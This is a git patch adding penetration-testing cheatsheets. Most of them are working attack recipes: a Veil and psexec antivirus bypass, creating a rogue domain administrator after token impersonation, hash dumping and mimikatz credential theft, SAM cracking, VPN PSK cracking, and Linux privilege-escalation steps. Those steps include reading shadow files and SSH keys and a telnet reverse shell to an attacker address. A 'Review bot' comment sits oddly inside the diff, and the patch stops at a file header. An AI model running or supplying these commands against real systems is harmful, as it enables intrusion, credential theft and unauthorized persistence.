From 95f035054b42545854904a28914d053ee373c56c Mon Sep 17 00:00:00 2001 From: JShaw Date: Thu, 11 Sep 2014 20:21:13 +0100 Subject: [PATCH] Cheatsheets Added more cheatsheets --- Cheatsheet_AVBypass.txt | 14 + Cheatsheet_ApacheSSL.txt | 42 ++ Cheatsheet_CookieStealing.txt | 12 + Cheatsheet_DomainAdminExploitation.txt | 30 ++ Cheatsheet_GDB.txt | 58 +++ Cheatsheet_GPG.txt | 14 + Cheatsheet_HTTPBasicAuth.txt | 40 ++ Cheatsheet_IKEScan_.txt | 60 +++ Cheatsheet_LinuxPrivilegeEsc.txt | 381 ++++++++++++++++++ Cheatsheet_LocalSamDump.txt | 18 + Cheatsheet_MSFPostExploitation.txt | 26 ++ Cheatsheet_MobileAppTesting.txt | 61 +++ PTCheatsheet.txt => Cheatsheet_PenTesting.txt | 16 +- Cheatsheet_SMBCapture.txt | 57 +++ Cheatsheet_SMBEnumeration.txt | 35 ++ Cheatsheet_SMTPOpenRelay.txt | 8 + Cheatsheet_SQLInjection.txt | 20 + Cheatsheet_SSLStrip.txt | 10 + Cheatsheet_WirelessTesting.txt | 66 +++ 19 files changed, 953 insertions(+), 15 deletions(-) create mode 100644 Cheatsheet_AVBypass.txt create mode 100644 Cheatsheet_ApacheSSL.txt create mode 100644 Cheatsheet_CookieStealing.txt create mode 100644 Cheatsheet_DomainAdminExploitation.txt create mode 100644 Cheatsheet_GDB.txt create mode 100644 Cheatsheet_GPG.txt create mode 100644 Cheatsheet_HTTPBasicAuth.txt create mode 100644 Cheatsheet_IKEScan_.txt create mode 100644 Cheatsheet_LinuxPrivilegeEsc.txt create mode 100644 Cheatsheet_LocalSamDump.txt create mode 100644 Cheatsheet_MSFPostExploitation.txt create mode 100644 Cheatsheet_MobileAppTesting.txt rename PTCheatsheet.txt => Cheatsheet_PenTesting.txt (96%) create mode 100644 Cheatsheet_SMBCapture.txt create mode 100644 Cheatsheet_SMBEnumeration.txt create mode 100644 Cheatsheet_SMTPOpenRelay.txt create mode 100644 Cheatsheet_SQLInjection.txt create mode 100644 Cheatsheet_SSLStrip.txt create mode 100644 Cheatsheet_WirelessTesting.txt diff --git a/Cheatsheet_AVBypass.txt b/Cheatsheet_AVBypass.txt new file mode 100644 index 0000000..355e94e --- /dev/null 
+++ b/Cheatsheet_AVBypass.txt @@ -0,0 +1,14 @@ +1. Generate executable using Veil. + +2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) + +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set RHOST 192.168.0.2 +RHOST => 192.168.0.2 +msf exploit(psexec) > set SMBUser user +SMBUser => user +msf exploit(psexec) > set SMBPass pass +SMBPass => pass +msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe +EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe +msf exploit(psexec) > exploit diff --git a/Cheatsheet_ApacheSSL.txt b/Cheatsheet_ApacheSSL.txt new file mode 100644 index 0000000..bf80b37 --- /dev/null +++ b/Cheatsheet_ApacheSSL.txt 
@@ -0,0 +1,42 @@ +# Enabling Self signed certificates on local website + +1. Install OpenSSL + +2. Run the following command to generate the self signed SSL certificates: + +openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mysitename.key -out mysitename.crt + +3. You will be prompted to enter your organizational information and a common name. The common name should be the fully qualified domain name for the site you are securing (www.mydomain.com). You can leave the email address, challenge password, and optional company name blank. When the command is finished running, it will create two files: a mysitename.key file and a mysitename.crt self signed certificate file valid for 365 days. + +4. Install the self signed certificate: + +Make a backup copy of /etc/apache2/sites-enabled/000-default and open the original in a text editor. + +Add the lines in bold below. +DocumentRoot /var/www/website +ServerName www.domain.com +SSLEngine on +SSLCertificateFile /etc/ssl/certs/primary.crt +SSLCertificateKeyFile /etc/ssl/certs/private.key +SSLCertificateChainFile /etc/ssl/certs/intermediate.crt + + +Change the names of the files and paths to match your certificate files. Save the changes and exit the text editor. + +5. Enable mod_ssl under apache using the following commands: + +a2enmod ssl +/etc/init.d/apache2 restart + +## Add ServerName localhost + +to /etc/apache2/apache2.conf + + +More information: +https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html +http://www.akadia.com/services/ssh_test_certificate.html +https://www.sslshopper.com/apache-server-ssl-installation-instructions.html +http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server + + diff --git a/Cheatsheet_CookieStealing.txt b/Cheatsheet_CookieStealing.txt new file mode 100644 index 0000000..aa0302c --- /dev/null +++ b/Cheatsheet_CookieStealing.txt 
@@ -0,0 +1,12 @@ +[+] Cookie Stealing: + +[-] Start Web Service + +python -m SimpleHTTPServer 80 + +[-] Use one of the following XSS payloads: + + + + + diff --git a/Cheatsheet_DomainAdminExploitation.txt b/Cheatsheet_DomainAdminExploitation.txt new file mode 100644 index 0000000..15bf8bf --- /dev/null +++ b/Cheatsheet_DomainAdminExploitation.txt @@ -0,0 +1,30 @@ +[+] After compromising a Windows machine: + +[>] List the domain administrators: +From Shell - net group "Domain Admins" /domain + +[>] Dump the hashes (Metasploit) +msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE + +[>] Find the admins (Metasploit) +spool /tmp/enumdomainusers.txt +msf > use auxiliary/scanner/smb/smb_enumusers_domain +msf > set smbuser Administrator +msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +msf > set rhosts 10.10.10.0/24 +msf > set threads 8 +msf > run + +msf> spool off + +[>] Compromise Admin's box +meterpreter > load incognito +meterpreter > list_tokens -u +meterpreter > impersonate_token MYDOM\\adaministrator +meterpreter > getuid +meterpreter > shell + +C:\> whoami +mydom\adaministrator +C:\> net user hacker /add /domain +C:\> net group "Domain Admins" hacker /add /domain diff --git a/Cheatsheet_GDB.txt b/Cheatsheet_GDB.txt new file mode 100644 index 0000000..33731f2 --- /dev/null +++ b/Cheatsheet_GDB.txt 
@@ -0,0 +1,58 @@ +set disassembly-flavor intel + +$ cat ~/.bash_aliases | grep gdb +alias gdb='gdb -quiet' + +Running gdb +------------------ +$ gdb - run, then use file command to load object +$ gdb -quiet - supress copyright information +$ gdb object - normal debug +$ gdb object core - analyze core dump +$ gdb object pid - attach to running process + +General commands +------------------ +set args - set program arguments +show args - show program arguments +run - run the program +run < file - run with input from file +set follow-exec-mode new/sam - set debugger response to an exec call +set write - set write into executables +set write off - unset write int oexecutables +continue - continue running until break +finish - execute until current stack frame ends +source FILE - read commands from script file +shell [cmd] - run cmd in a shell +display /5i $eip - display expression everytime execution stops +undisplay - undisplay expression number +info functions - list all the functions +info variables - list all the variables +info registers - list most common registers +info all-registers - list all registers +info display - print the list of displayed expressions +backtrace - print backtrace of all stack frames +where - same as backtrace +set disassembly-flavor intel - set disassembly style to intel/att +define hook-[cmd] - actions to execute before command +define hooopost-[cmd] - actions to execute after command +define hook-stop - actions to execute when execution stops + +Breakpoints +------------------ +info breakpoints - list all breakpoints +break [func] - break function name +break *[addr] - break at address +delete [bnum] - delete breakpoint bnum +break if [cond] - break if condition +ignore [bnum] [count] - ignore breakpoint bnum count times +condition [bnum] $eax == 0x22 - add condition for breakpoint 1 +condition [bnum] - delete condition for breakpoint 1 + +Watchpoints +------------------ +info watchpoints - list all the watchpoint +watch 
variable==value - break when variable equals .. +watch $eax == 0x0000ffaa - break when register equals .. +rwatch *[addr] - break on read memory location +awatch *[addr] - break on read/write memory location \ No newline at end of file diff --git a/Cheatsheet_GPG.txt b/Cheatsheet_GPG.txt new file mode 100644 index 0000000..58bfcf6 --- /dev/null +++ b/Cheatsheet_GPG.txt @@ -0,0 +1,14 @@ +Encrypt +------------ +sudo gpg -e ~/Desktop/file.doc + +This will prompt you to type in the persons name (public key) to encrypt with. + +Decrypt +----------- +sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc + + +Import other users' public keys by using: + +sudo gpg --import \ No newline at end of file diff --git a/Cheatsheet_HTTPBasicAuth.txt b/Cheatsheet_HTTPBasicAuth.txt new file mode 100644 index 0000000..d649ef2 --- /dev/null +++ b/Cheatsheet_HTTPBasicAuth.txt 
@@ -0,0 +1,40 @@ +[>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite + +http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ + +Burp Suite against HTTP Basic authentication + +To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. + +Mark only the Base64 encoded string and click Add button to put the markers around it. + +Dictionary attack + +For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. +Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. +Go to Payload tab and select Custom iterator option from Payload type dropdown box. +Burp Suite Custom Iterator +Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. +Position 1 list and separator option +Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. +Position 2 +After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. +PayloadProcessin_AddRule_Encode +PayloadProcessingEncode +By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. +That’s it. You can start the Intruder attack. 
+ +Bruteforce attack + +The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. +Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. +Burp Intruder Brute forcer +In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. +Burp Intruder Add Prefix +Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. +Burp Sutei Bruteforce Attack Settings +Done! You can start the Intruder attack! + +[>] Automated Security Analyser for ASP.NET Websites + +https://asafaweb.com \ No newline at end of file diff --git a/Cheatsheet_IKEScan_.txt b/Cheatsheet_IKEScan_.txt new file mode 100644 index 0000000..a1bb87d --- /dev/null +++ b/Cheatsheet_IKEScan_.txt 
@@ -0,0 +1,60 @@ +Aggressive Mode VPN -- IKE-Scan, PSK-Crack + +In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. + +This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. + +It looks like this: + +$ ike-scan 192.168.207.134 +Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) + +192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) +Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). +0 returned handshake; 1 returned notify + +---------------------------------------------------------------------------------------------------------------------------------- + +$ sudo ike-scan -A 192.168.207.134 +Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) + +192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) + +---------------------------------------------------------------------------------------------------------------------------------- + +To save with some output: + +$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key + +Once you have you psk file to crack you're stuck with two options psk-crack and cain + 
+---------------------------------------------------------------------------------------------------------------------------------- + +Brute force: + +$psk-crack -b 5 192-168-207-134key +Running in brute-force cracking mode +Brute force with 36 chars up to length 5 will take up to 60466176 iterations + +no match found for MD5 hash 5c178d[SNIP] +Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) + +Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= + +$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key +Running in brute-force cracking modde +Brute force with 63 chars up to length 5 will take up to 992436543 iterations + +---------------------------------------------------------------------------------------------------------------------------------- + +Dictionary attack: + +$psk-crack -d /path/to/dictionary 192-168-207-134key +Running in dictionary cracking mode + +no match found for MD5 hash 5c178d[SNIP] +Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) + +---------------------------------------------------------------------------------------------------------------------------------- + +References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html \ No newline at end of file diff --git a/Cheatsheet_LinuxPrivilegeEsc.txt b/Cheatsheet_LinuxPrivilegeEsc.txt new file mode 100644 index 0000000..162e187 --- /dev/null +++ b/Cheatsheet_LinuxPrivilegeEsc.txt 
@@ -0,0 +1,381 @@ +Enumeration is the key. +(Linux) privilege escalation is all about: +Collect - Enumeration, more enumeration and some more enumeration. +Process - Sort through data, analyse and prioritisation. +Search - Know what to search for and where to find the exploit code. +Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box". +Try - Get ready for (lots of) trial and error. + +Operating System +What's the distribution type? What version? +cat /etc/issue +cat /etc/*-release + cat /etc/lsb-release + cat /etc/redhat-release + + +What's the Kernel version? Is it 64-bit? +cat /proc/version +uname -a +uname -mrs +rpm -q kernel +dmesg | grep Linux +ls /boot | grep vmlinuz- + + +What can be learnt from the environmental variables? +cat /etc/profile +cat /etc/bashrc +cat ~/.bash_profile +cat ~/.bashrc +cat ~/.bash_logout +env +set + + +Is there a printer? +lpstat -a + + +Applications & Services +What services are running? Which service has which user privilege? +ps aux +ps -ef +top +cat /etc/service + + +Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check! +ps aux | grep root +ps -ef | grep root + + +What applications are installed? What version are they? Are they currently running? +ls -alh /usr/bin/ +ls -alh /sbin/ +dpkg -l +rpm -qa +ls -alh /var/cache/apt/archivesO +ls -alh /var/cache/yum/ + + +Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? +cat /etc/syslog.conf +cat /etc/chttp.conf +cat /etc/lighttpd.conf +cat /etc/cups/cupsd.conf +cat /etc/inetd.conf +cat /etc/apache2/apache2.conf +cat /etc/my.conf +cat /etc/httpd/conf/httpd.conf +cat /opt/lampp/etc/httpd.conf +ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ + + +What jobs are scheduled? 
+crontab -l +ls -alh /var/spool/cron +ls -al /etc/ | grep cron +ls -al /etc/cron* +cat /etc/cron* +cat /etc/at.allow +cat /etc/at.deny +cat /etc/cron.allow +cat /etc/cron.deny +cat /etc/crontab +cat /etc/anacrontab +cat /var/spool/cron/crontabs/root + +Any plain text usernames and/or passwords? +grep -i user [filename] +grep -i pass [filename] +grep -C 5 "password" [filename] +find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla + + +Communications & Networking +What NIC(s) does the system have? Is it connected to another network? +/sbin/ifconfig -a +cat /etc/network/interfaces +cat /etc/sysconfig/network + + +What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? +cat /etc/resolv.conf +cat /etc/sysconfig/network +cat /etc/networks +iptables -L +hostname +dnsdomainname + + +What other users & hosts are communicating with the system? +lsof -i +lsof -i :80 +grep 80 /etc/services +netstat -antup +netstat -antpx +netstat -tulpn +chkconfig --list +chkconfig --list | grep 3:on +last +w + + +Whats cached? IP and/or MAC addresses +arp -e +route +/sbin/route -nee + + +Is packet sniffing possible? What can be seen? Listen to live traffic +# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] +tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21 + + +Have you got a shell? Can you interact with the system? +# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ +nc -lvp 4444 # Attacker. Input (Commands) +nc -lvp 4445 # Attacker. Ouput (Results) +telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP! + + +Is port forwarding possible? 
Redirect and interact with traffic from another view +# rinetd +# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch + +# fpipe +# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP] +FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 + +# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] +ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port +ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port + +# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe +mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay +mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) +mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080) + + +Is tunnelling possible? Send commands locally, remotely +ssh -D 127.0.0.1:9050 -N [username]@[ip] +proxychains ifconfig + + +Confidential Information & Users +Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? +id +who +w +last +cat /etc/passwd | cut -d: # List of users +grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users +awk -F: '($3 == "0") {print}' /etc/passwd # List of super users +cat /etc/sudoers +sudo -l + + +What sensitive files can be found? +cat /etc/passwd +cat /etc/group +cat /etc/shadow +ls -alh /var/mail/ + + +Anything "interesting" in the home directorie(s)? If it's possible to access +ls -ahlR /root/ +ls -ahlR /home/ + + +Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords +cat /var/apache2/config.inc +cat /var/lib/mysql/mysql/user.MYD +cat /root/anaconda-ks.cfg + + +What has the user being doing? Is there any password in plain text? What have they been edting? 
+cat ~/.bash_history +cat ~/.nano_history +cat ~/.atftp_history +cat ~/.mysql_history +cat ~/.php_history + + +What user information can be found? +cat ~/.bashrc +cat ~/.profile +cat /var/mail/root +cat /var/spool/mail/root + + +Can private-key information be found? +cat ~/.ssh/authorized_keys +cat ~/.ssh/identity.pub +cat ~/.ssh/identity +cat ~/.ssh/id_rsa.pub +cat ~/.ssh/id_rsa +cat ~/.ssh/id_dsa.pub +cat ~/.ssh/id_dsa +cat /etc/ssh/ssh_config +cat /etc/ssh/sshd_config +cat /etc/ssh/ssh_host_dsa_key.pub +cat /etc/ssh/ssh_host_dsa_key +cat /etc/ssh/ssh_host_rsa_key.pub +cat /etc/ssh/ssh_host_rsa_key +cat /etc/ssh/ssh_host_key.pub +cat /etc/ssh/ssh_host_key + + +File Systems +Which configuration files can be written in /etc/? Able to reconfigure a service? +ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone +ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner +ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group +ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other + +find /etc/ -readable -type f 2>/dev/null # Anyone +find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone + + +What can be found in /var/ ? +ls -alh /var/log +ls -alh /var/mail +ls -alh /var/spool +ls -alh /var/spool/lpd +ls -alh /var/lib/pgsql +ls -alh /var/lib/mysql +cat /var/lib/dhcp3/dhclient.leases + + +Any settings/files (hidden) on website? Any settings file with database information? +ls -alhR /var/www/ +ls -alhR /srv/www/htdocs/ +ls -alhR /usr/local/www/apache22/data/ +ls -alhR /opt/lampp/htdocs/ +ls -alhR /var/www/html/ + + +Is there anything in the log file(s) (Could help with "Local File Includes"!) 
+# http://www.thegeekstuff.com/2011/08/linux-var-log-files/ +cat /etc/httpd/logs/access_log +cat /etc/httpd/logs/access.log +cat /etc/httpd/logs/error_log +cat /etc/httpd/logs/error.log +cat /var/log/apache2/access_log +cat /var/log/apache2/access.log +cat /var/log/apache2/error_log +cat /var/log/apache2/error.log +cat /var/log/apache/access_log +cat /var/log/apache/access.log +cat /var/log/auth.log +cat /var/log/chttp.log +cat /var/log/cups/error_log +cat /var/log/dpkg.log +cat /var/log/faillog +cat /var/log/httpd/access_log +cat /var/log/httpd/access.log +cat /var/log/httpd/error_log +cat /var/log/httpd/error.log +cat /var/log/lastlog +cat /var/log/lighttpd/access.log +cat /var/log/lighttpd/error.log +cat /var/log/lighttpd/lighttpd.access.log +cat /var/log/lighttpd/lighttpd.error.log +cat /var/log/messages +cat /var/log/secure +cat /var/log/syslog +cat /var/log/wtmp +cat /var/log/xferlog +cat /var/log/yum.log +cat /var/run/utmp +cat /var/webmin/miniserv.log +cat /var/www/logs/access_log +cat /var/www/logs/access.log +ls -alh /var/lib/dhcp3/ +ls -alh /var/log/postgresql/ +ls -alh /var/log/proftpd/ +ls -alh /var/log/samba/ +# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp + + +If commands are limited, you break out of the "jail" shell? +python -c 'import pty;pty.spawn("/bin/bash")' +echo os.system('/bin/bash') +/bin/sh -i + + +How are file-systems mounted? +mount +df -h + + +Are there any unmounted file-systems? +cat /etc/fstab + + +What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID +find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here +find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. +find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. 
+ +find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID +for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) + +# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) +find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null + + +Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm +find / -writable -type d 2>/dev/null # world-writeable folders +find / -perm -222 -type d 2>/dev/null # world-writeable folders +find / -perm -o+w -type d 2>/dev/null # world-writeable folders + +find / -perm -o+x -type d 2>/dev/null # world-executable folders + +find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders + + +Any "problem" files? Word-writeable, "nobody" files +find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files +find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files + + +Preparation & Finding Exploit Code +What development tools/languages are installed/supported? +find / -name perl* +find / -name python* +find / -name gcc* +find / -name cc + + +How can files be uploaded? 
+find / -name wget +find / -name nc* +find / -name netcat* +find / -name tftp* +find / -name ftp + + +Finding exploit code +http://www.exploit-db.com +http://1337day.com +http://www.securiteam.com +http://www.securityfocus.com +http://www.exploitsearch.net +http://metasploit.com/modules/ +http://securityreason.com +http://seclists.org/fulldisclosure/ +http://www.google.com + + +Finding more information regarding the exploit +http://www.cvedetails.com +http://packetstormsecurity.org/files/cve/[CVE] +http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] +http://www.vulnview.com/cve-details.php?cvename=[CVE] + + +(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk +http://tarantula.by.ru/localroot/ +http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/ diff --git a/Cheatsheet_LocalSamDump.txt b/Cheatsheet_LocalSamDump.txt new file mode 100644 index 0000000..b3ab9c1 --- /dev/null +++ b/Cheatsheet_LocalSamDump.txt @@ -0,0 +1,18 @@ +fdisk -l + +mount -t ntfs /dev/sda1 /mnt + +df -k + +cd /mnt +ls +cd WINDOWS/system32/config + +ls +bkhive system /root/hive.txt +samdump2 SAM /root/hive.txt > /root/hash.txt + +john /root/hash.txt -format=nt2 -users=Administrator +cd /root/.john +ls -l +cat john.pot \ No newline at end of file diff --git a/Cheatsheet_MSFPostExploitation.txt b/Cheatsheet_MSFPostExploitation.txt new file mode 100644 index 0000000..48ab5fd --- /dev/null +++ b/Cheatsheet_MSFPostExploitation.txt 
@@ -0,0 +1,26 @@ +[+] Meterpreter Shell + +meterpreter > sysinfo + +meterpreter > getuid + +meterpreter > getsystem + +meterpreter > hashdump + +meterpreter > load/use mimikatz + +kerberos Attempt to retrieve kerberos creds +livessp Attempt to retrieve livessp creds +mimikatz_command Run a custom commannd +msv Attempt to retrieve msv creds (hashes) +ssp Attempt to retrieve ssp creds +tspkg Attempt to retrieve tspkg creds +wdigest Attempt to retrieve wdigest creds + +meterpreter > wdigest + +meterpreter > use incognito +meterpreter > list_tokens -u +meterpreter > impersonate_token SERV-2K3\\Administrator +execute -f cmd.exe -i -t \ No newline at end of file diff --git a/Cheatsheet_MobileAppTesting.txt b/Cheatsheet_MobileAppTesting.txt new file mode 100644 index 0000000..2509a65 --- /dev/null +++ b/Cheatsheet_MobileAppTesting.txt 
@@ -0,0 +1,61 @@ +http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources + +------------------------------------------ Mobile Application Test Notes (iPhone) + + +Prepping Device and Application: + +[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 +[+] Enable SSH on iPhone/iPad +[+] Install iFunbox to install the application (http://www.i-funbox.com) +[+] Connect device to lab wireless network +[+] Add web proxy settings - IP address of attacking machine port 8080 +[+] Ensure connection and SSH is working + + +Prepping Burp Suite: + +[+] Open Burp Suite and navigate to Proxy->Options, + [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. + +[+] Download and install burp certificate (.crt) onto ipad. + +Mobile Application Penetration Testing: + +[+] Browse the following Directory for insecure storage + [-] /private/var/mobile/applications/ + + +Notes: + +[+] Application file type - x.ipa + + +------------------------------------------ Mobile Application Test Notes (Android) + +[+] Create a virtual device: + [-] android avd + +[+] Start the emulator: + [-] emulator –avd testavd + +[+] Install the application: + [-] adb install + +[+] Open Burp Suite and navigate to Proxy->Options, + [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. + +[+] Start the emulator and proxy: + [-] emulator –avd testavd –http-proxy http://localhost:8080 + +[+] Download and install burp certificate (.crt) onto the emulator using the push shell command. + + +Notes: + +[+] Application file type - x.apk + +Install Certs: http://www.realmb.com/droidCert/ +SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp + +http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf \ No newline at end of file 
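Review bot: In Cheatsheet_MobileAppTesting.txt the Android commands use en-dashes instead of hyphens: `emulator –avd testavd` and `emulator –avd testavd –http-proxy http://localhost:8080` fail when pasted into a shell and must read `-avd` and `-http-proxy`. `adb install` is shown without the .apk path, and "using the push shell command" should name the command (`adb push <burp>.crt /sdcard/`). The Burp listener step ("disable loopback only") binds the proxy to every interface, which exposes it to anything else on the lab network; say that the listener should be bound to the lab-facing address only or firewalled.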
diff --git a/PTCheatsheet.txt b/Cheatsheet_PenTesting.txt similarity index 96% rename from PTCheatsheet.txt rename to Cheatsheet_PenTesting.txt index b584463..2d81f29 100644 --- a/PTCheatsheet.txt +++ b/Cheatsheet_PenTesting.txt @@ -159,16 +159,6 @@ put shell.asp shell.txt copy shell.txt shell.asp;.txt Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt --------------------------------------------------------------------------- Web Applications - - --------------------------------------------------------------------------- Remote Maintenance Services - -Metasploit Auxiliarys - --------------------------------------------------------------------------- Database Services - -Metasploit Auxiliarys -------------------------------------------------------------------------- Windows Networking Services @@ -253,9 +243,6 @@ usermod -R root user [+] Dump remote SAM: PwDump.exe -u localadmin 192.168.0.1 -[+] Cracking Cached Domain/AD Passwords -Irongeek - Cachecrack - [+] Mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonPasswords full @@ -347,7 +334,6 @@ set AutoRunScript "migrate explorer.exe" [+] Set up SOCKS proxy in MSF - [+] Run a post module against all sessions resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc @@ -377,7 +363,7 @@ show evasion [+] Metasploit Shellcode msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' --------------------------------------------------------------------------- Services +-------------------------------------------------------------------------- File Transfer Services [+] Start TFTPD Server atftpd --daemon --port 69 /tmp diff --git a/Cheatsheet_SMBCapture.txt b/Cheatsheet_SMBCapture.txt new file mode 100644 index 0000000..7a79977 --- /dev/null +++ b/Cheatsheet_SMBCapture.txt 
